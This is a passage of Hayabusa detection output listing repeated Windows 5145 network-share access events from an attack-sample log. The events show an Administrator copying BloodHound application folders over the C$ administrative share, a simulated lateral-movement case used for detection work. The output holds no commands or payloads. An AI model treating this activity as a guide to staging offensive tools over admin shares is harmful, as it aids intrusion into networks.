| LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.438 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.438 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.438 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.448 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.448 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.448 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.458 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.458 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.458 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.458 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.468 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.468 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.468 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.478 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.478 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.478 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.518 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.518 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.518 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.558 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.558 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.558 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.558 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.568 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.568 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.568 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.578 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.578 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.578 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.588 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.588 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.588 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.588 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.598 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.598 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.598 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.598 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.608 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.608 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.608 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.608 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.608 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.618 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.618 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.618 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.618 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.618 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.628 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.628 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.628 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.628 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.638 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.638 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.638 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.638 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:24.638 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac | IP Addr: 10.0.2.15 | LID: 